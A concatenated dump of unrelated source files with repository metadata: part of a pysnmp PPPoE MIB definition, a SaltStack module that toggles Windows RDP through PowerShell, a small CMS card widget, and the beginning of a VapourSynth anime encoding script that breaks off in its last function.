usdPPPoESummarySubIfAdminUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfAdminUp.setStatus('current')
usdPPPoESummarySubIfAdminDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfAdminDown.setStatus('current')
usdPPPoESummarySubIfOperUp = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfOperUp.setStatus('current')
usdPPPoESummarySubIfOperDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfOperDown.setStatus('current')
usdPPPoESummarySubIfLowerLayerDown = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfLowerLayerDown.setStatus('current')
usdPPPoESummarySubIfNotPresent = MibScalar((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 1, 5, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: usdPPPoESummarySubIfNotPresent.setStatus('current')
usdPPPoEConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4))
usdPPPoECompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5))
usdPPPoEGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4))
usdPPPoECompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 1)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance = usdPPPoECompliance.setStatus('obsolete')
usdPPPoECompliance2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 2)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance2 = usdPPPoECompliance2.setStatus('obsolete')
usdPPPoECompliance3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 3)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileGroup"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance3 = usdPPPoECompliance3.setStatus('obsolete')
usdPPPoECompliance4 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 4)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance4 = usdPPPoECompliance4.setStatus('obsolete')
usdPPPoECompliance5 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 5)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup3"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance5 = usdPPPoECompliance5.setStatus('obsolete')
usdPPPoECompliance6 = ModuleCompliance((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 5, 6)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEGroup4"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfGroup2"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoECompliance6 = usdPPPoECompliance6.setStatus('current')
usdPPPoEGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 1)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup = usdPPPoEGroup.setStatus('obsolete')
usdPPPoESubIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 2)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfNextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfSessionId"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESubIfGroup = usdPPPoESubIfGroup.setStatus('obsolete')
usdPPPoEProfileGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 3)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileUrl"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEProfileMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEProfileGroup = usdPPPoEProfileGroup.setStatus('deprecated')
usdPPPoEGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 4)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup2 = usdPPPoEGroup2.setStatus('obsolete')
usdPPPoESubIfGroup2 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 5)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfNextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfSessionId"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfUrl"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESubIfMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESubIfGroup2 = usdPPPoESubIfGroup2.setStatus('current')
usdPPPoESummaryGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 6)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoEMajorInterfaceCount"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfAdminUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfAdminDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfOperUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfOperDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfNotPresent"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummaryMajorIfLowerLayerDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubInterfaceCount"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfAdminUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfAdminDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfOperUp"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfOperDown"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfNotPresent"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoESummarySubIfLowerLayerDown"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoESummaryGroup = usdPPPoESummaryGroup.setStatus('current')
usdPPPoEGroup3 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 7)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAcName"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfDupProtect"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup3 = usdPPPoEGroup3.setStatus('obsolete')
usdPPPoEGroup4 = ObjectGroup((1, 3, 6, 1, 4, 1, 4874, 2, 2, 18, 4, 4, 8)).setObjects(("Unisphere-Data-PPPOE-MIB", "usdPPPoENextIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfMaxNumSessions"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfRowStatus"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfLowerIfIndex"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAcName"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfDupProtect"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfPADIFlag"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfAutoconfig"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADI"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADO"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADR"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADS"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADT"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvVersion"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvCode"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTags"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvSession"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvTypes"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInvPackets"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsRxInsufficientResources"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEIfStatsTxPADM"), ("Unisphere-Data-PPPOE-MIB", "usdPPPoEGlobalMotm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
usdPPPoEGroup4 = usdPPPoEGroup4.setStatus('current')
mibBuilder.exportSymbols("Unisphere-Data-PPPOE-MIB", usdPPPoEIfIfIndex=usdPPPoEIfIfIndex, usdPPPoEProfileUrl=usdPPPoEProfileUrl, usdPPPoESubIfNextIfIndex=usdPPPoESubIfNextIfIndex, usdPPPoEIfStatsRxInvCode=usdPPPoEIfStatsRxInvCode, usdPPPoESubIfTable=usdPPPoESubIfTable, usdPPPoEGroup2=usdPPPoEGroup2, usdPPPoECompliance5=usdPPPoECompliance5, usdPPPoESummaryMajorIfOperUp=usdPPPoESummaryMajorIfOperUp, usdPPPoEGlobalMotm=usdPPPoEGlobalMotm, usdPPPoESummaryMajorIfLowerLayerDown=usdPPPoESummaryMajorIfLowerLayerDown, usdPPPoESubIfRowStatus=usdPPPoESubIfRowStatus, usdPPPoEIfDupProtect=usdPPPoEIfDupProtect, usdPPPoESubIfGroup=usdPPPoESubIfGroup, usdPPPoEIfAcName=usdPPPoEIfAcName, usdPPPoECompliances=usdPPPoECompliances, usdPPPoEIfStatsRxPADI=usdPPPoEIfStatsRxPADI, usdPPPoEIfStatsTxPADS=usdPPPoEIfStatsTxPADS, usdPPPoEIfPADIFlag=usdPPPoEIfPADIFlag, usdPPPoESubIfLayer=usdPPPoESubIfLayer, usdPPPoESummarySubIfLowerLayerDown=usdPPPoESummarySubIfLowerLayerDown, PYSNMP_MODULE_ID=usdPPPoEMIB, usdPPPoEIfStatsRxInvPackets=usdPPPoEIfStatsRxInvPackets, usdPPPoESummarySubIfNotPresent=usdPPPoESummarySubIfNotPresent, usdPPPoEProfileEntry=usdPPPoEProfileEntry, usdPPPoESummarySubIfAdminDown=usdPPPoESummarySubIfAdminDown, usdPPPoESubIfLowerIfIndex=usdPPPoESubIfLowerIfIndex, usdPPPoEGroup3=usdPPPoEGroup3, usdPPPoEIfLowerIfIndex=usdPPPoEIfLowerIfIndex, usdPPPoEIfStatsTable=usdPPPoEIfStatsTable, usdPPPoEIfStatsRxInvVersion=usdPPPoEIfStatsRxInvVersion, usdPPPoEProfile=usdPPPoEProfile, usdPPPoEIfStatsEntry=usdPPPoEIfStatsEntry, usdPPPoESubIfIndex=usdPPPoESubIfIndex, usdPPPoEIfStatsRxInvSession=usdPPPoEIfStatsRxInvSession, usdPPPoEProfileMotm=usdPPPoEProfileMotm, usdPPPoEProfileGroup=usdPPPoEProfileGroup, usdPPPoEMIB=usdPPPoEMIB, usdPPPoECompliance6=usdPPPoECompliance6, usdPPPoEIfStatsRxInvTypes=usdPPPoEIfStatsRxInvTypes, usdPPPoEGlobal=usdPPPoEGlobal, usdPPPoEProfileIndex=usdPPPoEProfileIndex, usdPPPoEObjects=usdPPPoEObjects, usdPPPoESummaryGroup=usdPPPoESummaryGroup, 
usdPPPoEIfStatsRxInsufficientResources=usdPPPoEIfStatsRxInsufficientResources, usdPPPoEGroups=usdPPPoEGroups, usdPPPoECompliance3=usdPPPoECompliance3, usdPPPoESubIfUrl=usdPPPoESubIfUrl, usdPPPoESummaryMajorIfAdminDown=usdPPPoESummaryMajorIfAdminDown, usdPPPoEIfTable=usdPPPoEIfTable, usdPPPoESummaryMajorIfOperDown=usdPPPoESummaryMajorIfOperDown, usdPPPoESummarySubIfAdminUp=usdPPPoESummarySubIfAdminUp, usdPPPoESubIfSessionId=usdPPPoESubIfSessionId, usdPPPoECompliance2=usdPPPoECompliance2, usdPPPoEIfStatsTxPADO=usdPPPoEIfStatsTxPADO, usdPPPoEProfileRowStatus=usdPPPoEProfileRowStatus, usdPPPoESubIfMotm=usdPPPoESubIfMotm, usdPPPoEIfEntry=usdPPPoEIfEntry, usdPPPoENextIfIndex=usdPPPoENextIfIndex, usdPPPoEIfAutoconfig=usdPPPoEIfAutoconfig, usdPPPoESummary=usdPPPoESummary, usdPPPoEMajorInterfaceCount=usdPPPoEMajorInterfaceCount, usdPPPoEIfStatsTxPADT=usdPPPoEIfStatsTxPADT, usdPPPoEIfMaxNumSessions=usdPPPoEIfMaxNumSessions, usdPPPoESummarySubIfOperUp=usdPPPoESummarySubIfOperUp, usdPPPoEGroup4=usdPPPoEGroup4, usdPPPoECompliance=usdPPPoECompliance, usdPPPoESummaryMajorIfAdminUp=usdPPPoESummaryMajorIfAdminUp, usdPPPoECompliance4=usdPPPoECompliance4, usdPPPoEIfStatsRxPADR=usdPPPoEIfStatsRxPADR, usdPPPoESummarySubInterfaceCount=usdPPPoESummarySubInterfaceCount, usdPPPoEIfStatsTxPADM=usdPPPoEIfStatsTxPADM, usdPPPoESubIfGroup2=usdPPPoESubIfGroup2, usdPPPoEConformance=usdPPPoEConformance, usdPPPoEIfStatsRxInvTags=usdPPPoEIfStatsRxInvTags, usdPPPoEGroup=usdPPPoEGroup, usdPPPoESummaryMajorIfNotPresent=usdPPPoESummaryMajorIfNotPresent, usdPPPoESubIfEntry=usdPPPoESubIfEntry, usdPPPoESummarySubIfOperDown=usdPPPoESummarySubIfOperDown, usdPPPoEIfLayer=usdPPPoEIfLayer, usdPPPoEIfRowStatus=usdPPPoEIfRowStatus, usdPPPoEProfileTable=usdPPPoEProfileTable, usdPPPoESubIfId=usdPPPoESubIfId, usdPPPoEIfStatsRxPADT=usdPPPoEIfStatsRxPADT)
| 148.923077 | 3,802 | 0.761639 |
acfa983e525f7016d11c0d5fcf9c7f718138a40d | 1,781 | py | Python | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | 1 | 2015-05-20T16:55:50.000Z | 2015-05-20T16:55:50.000Z | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | null | null | null | salt/modules/rdp.py | styro/salt | d087d94dca02ca8bf53a6c21b94944bc7957522c | [
"Apache-2.0"
] | 1 | 2021-12-02T15:30:00.000Z | 2021-12-02T15:30:00.000Z | # -*- coding: utf-8 -*-
'''
Manage RDP Service on Windows servers
'''
from __future__ import absolute_import
# Import python libs
import re
# Import salt libs
import salt.utils
def __virtual__():
    '''
    Load this module only on Windows minions; returns the virtual module
    name ``rdp`` there and ``False`` everywhere else.
    '''
    if not salt.utils.is_windows():
        return False
    return 'rdp'
def _parse_return_code_powershell(string):
'''
return from the input string the return code of the powershell command
'''
regex = re.search(r'ReturnValue\s*: (\d*)', string)
if not regex:
return False
else:
return int(regex.group(1))
def _psrdp(cmd):
    '''
    Run ``cmd`` in powershell after binding ``$RDP`` to the local
    Win32_TerminalServiceSetting WMI object; returns the command STDOUT.
    '''
    ps_rdp_object = ('$RDP = Get-WmiObject -Class Win32_TerminalServiceSetting '
                     '-Namespace root\\CIMV2\\TerminalServices -Computer . '
                     '-Authentication 6 -ErrorAction Stop')
    full_command = '{0} ; {1}'.format(ps_rdp_object, cmd)
    return __salt__['cmd.run'](full_command, shell='powershell')
def enable():
    '''
    Enable RDP the service on the server

    CLI Example:

    .. code-block:: bash

        salt '*' rdp.enable
    '''
    # WMI SetAllowTsConnections returns 0 on success.
    output = _psrdp('$RDP.SetAllowTsConnections(1,1)')
    return _parse_return_code_powershell(output) == 0
def disable():
    '''
    Disable RDP the service on the server

    CLI Example:

    .. code-block:: bash

        salt '*' rdp.disable
    '''
    # WMI SetAllowTsConnections returns 0 on success.
    output = _psrdp('$RDP.SetAllowTsConnections(0,1)')
    return _parse_return_code_powershell(output) == 0
def status():
    '''
    Show if rdp is enabled on the server

    CLI Example:

    .. code-block:: bash

        salt '*' rdp.status
    '''
    raw = _psrdp('echo $RDP.AllowTSConnections').strip()
    return int(raw) != 0
| 19.788889 | 76 | 0.608647 |
acfa993e0fd83e7f715643765d92b8919b5eb5a8 | 409 | py | Python | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | 8 | 2017-01-30T22:46:40.000Z | 2018-03-30T21:35:28.000Z | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | null | null | null | canella/widget/widgets/card.py | mush42/Canella-CMS | b5132c271a3b8840f0b165c62d14de6853a3e5ac | [
"MIT"
] | 2 | 2018-01-16T10:31:27.000Z | 2020-10-01T19:49:10.000Z | from .. import Widget, WidgetWidth, WidgetLocation
class CardWidget(Widget):
    """Admin dashboard card: an icon plus two headings and a details link."""

    template = 'canella/admin/widgets/card.html'
    width = WidgetWidth.third

    def __init__(self, color, icon, main_heading, sub_heading, details_link):
        # Plain value-holder; the template consumes these attributes directly.
        self.details_link = details_link
        self.sub_heading = sub_heading
        self.main_heading = main_heading
        self.icon = icon
        self.color = color
| 31.461538 | 77 | 0.696822 |
acfa997df58d76a961a816de2294bddb2e7b57ae | 7,402 | py | Python | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 36 | 2019-11-08T20:50:07.000Z | 2022-03-23T05:43:55.000Z | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 1 | 2019-11-08T21:26:16.000Z | 2019-11-08T21:26:16.000Z | Raws-Maji/Rifle is Beautiful [BD]/rifle_08.py | Ichunjo/encode-script | 389a9f497e637eaade6f99acee816636856961d4 | [
"MIT"
] | 7 | 2019-11-08T21:10:47.000Z | 2022-03-28T21:57:04.000Z | """Rifle is Beautiful script"""
__author__ = 'Vardë'
import os
import sys
import shlex
import subprocess
from pathlib import Path
from typing import NamedTuple
import debandshit as dbs
import vardefunc as vdf
import havsfunc as hvf
import G41Fun as gf
from vsutil import depth
import lvsfunc as lvf
import vapoursynth as vs
core = vs.core
class InfosBD(NamedTuple):
    """Immutable record describing one BDMV stream and its derived paths."""
    path: str                # base path of the m2ts stream (no extension)
    src: str                 # full path to the source .m2ts
    src_clip: vs.VideoNode   # full source clip as indexed by lvf.src
    frame_start: int         # first frame kept (0 = from the start)
    frame_end: int           # last frame bound (negative = trim from the end)
    src_cut: vs.VideoNode    # trimmed clip
    a_src: str               # extracted-audio path template ({} = track number)
    a_src_cut: str           # trimmed-audio path template
    a_enc_cut: str           # encoded-audio path template
    name: str                # script stem, used to name outputs
    output: str              # raw HEVC bitstream output path
    chapter: str             # chapter file path
    output_final: str        # final muxed .mkv path
def infos_bd(path, frame_start, frame_end) -> InfosBD:
    """Index the .m2ts at *path*, trim it, and bundle every derived path."""
    src = path + '.m2ts'
    src_clip = lvf.src(src, stream_index=0, ff_loglevel=4)
    # Only slice when at least one trim bound is non-zero.
    if frame_start or frame_end:
        src_cut = src_clip[frame_start:frame_end]
    else:
        src_cut = src_clip
    name = Path(sys.argv[0]).stem
    return InfosBD(
        path, src, src_clip, frame_start, frame_end, src_cut,
        path + '_track_{}.wav',
        path + '_cut_track_{}.wav',
        path + '_track_{}.m4a',
        name,
        name + '.265',
        '_assets/chapters/' + name + '.txt',
        name + '.mkv',
    )
# Episode stream plus creditless OP/ED sources used for credit masking.
JPBD = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX2_D3\BDMV\STREAM\00003', 0, -27)
JPBD_NCOP = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX1_D1\BDMV\STREAM\00006', 24, -24)
JPBD_NCED = infos_bd(r'[BDMV][Rifle is Beautiful][Blu-Ray BOX BDx4+CDx2 Fin]\RIFLE_IS_BEAUTIFUL_BDBOX1_D1\BDMV\STREAM\00007', 0, -24)
# NOTE(review): X265 appears unused in this file — do_encode hardcodes the
# 'x265' binary name in its command string. TODO confirm before removing.
X265 = 'x265'
def do_filter():
    """Vapoursynth filtering chain: dehalo -> AA -> sharpen -> deband,
    then restore the original OP/ED credits through a diff mask.

    Returns the filtered clip dithered down to 10 bits.
    """
    src = JPBD.src_cut
    src = depth(src, 16)
    # Pad with a duplicate of the last frame (keeps length even for encoding).
    out = src + src[-1]

    # OP/ED frame ranges for this episode.
    opstart, opend = 2638, 4794
    edstart, edend = 31767, 33924

    # Halo removal.
    dehalo = gf.MaskedDHA(out, rx=1.35, ry=1.35, darkstr=0.25, brightstr=1.0, maskpull=46, maskpush=148)
    out = dehalo

    # Anti-aliasing.
    antialias = lvf.sraa(out, 1.5, 9, downscaler=core.resize.Bicubic)
    out = antialias

    # Edge-masked sharpening.
    sharp = hvf.LSFmod(out, strength=75, Smode=3, Lmode=1, edgemode=1, edgemaskHQ=True)
    out = sharp

    # Debanding, protected by a detail mask so fine detail is kept.
    deband_mask = lvf.denoise.detail_mask(out, brz_a=2000, brz_b=1000)
    deband = dbs.f3kpf(out, 17, 24, 24)
    deband = core.std.MaskedMerge(deband, out, deband_mask)
    out = deband

    # Build credit masks by diffing the episode against the creditless OP/ED,
    # then merge the untouched source back over credited ranges.
    src_c, ncop, nced = [clip.std.Median() for clip in [src, JPBD_NCOP.src_cut, JPBD_NCED.src_cut]]
    opening_mask = vdf.dcm(out, src_c[opstart:opend+1], ncop[:opend-opstart+1], opstart, opend, 3, 3)
    ending_mask = vdf.dcm(out, src_c[edstart:edend+1], nced[:edend-edstart+1], edstart, edend, 3, 3)
    credit_mask = core.std.Expr([opening_mask, ending_mask], 'x y +').std.Convolution([1]*9)
    credit = lvf.rfs(out, core.std.MaskedMerge(out, src, credit_mask), [(opstart, opend), (edstart, edend)])
    out = credit

    return depth(out, 10)
def sec_to_time(secs):
    """Format a duration in seconds as an ``HH:MM:SS.ssss`` timestamp string."""
